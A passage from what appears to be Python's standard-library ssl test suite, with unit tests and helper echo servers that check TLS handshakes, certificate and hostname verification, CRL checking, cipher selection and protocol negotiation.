s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
rc = s.connect_ex((REMOTE_HOST, 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet(REMOTE_HOST):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=REMOTE_HOST)
s.connect((REMOTE_HOST, 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(REMOTE_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(REMOTE_ROOT_CERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet(REMOTE_HOST):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect((REMOTE_HOST, 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet(REMOTE_HOST):
s = socket.socket(socket.AF_INET)
s.connect((REMOTE_HOST, 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = (REMOTE_HOST, 443)
with support.transient_internet(remote[0]):
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(remote)
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet(REMOTE_HOST):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect((REMOTE_HOST, 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
class NetworkedBIOTests(unittest.TestCase):
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_handshake(self):
with support.transient_internet(REMOTE_HOST):
sock = socket.socket(socket.AF_INET)
sock.connect((REMOTE_HOST, 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(REMOTE_ROOT_CERT)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, REMOTE_HOST)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# self-signed.pythontest.net probably shuts down the TCP
# connection without sending a secure shutdown message, and
# this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
sock.close()
def test_read_write_data(self):
with support.transient_internet(REMOTE_HOST):
sock = socket.socket(socket.AF_INET)
sock.connect((REMOTE_HOST, 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'GET / HTTP/1.0\r\n\r\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf[:5], b'HTTP/')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
sock.close()
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
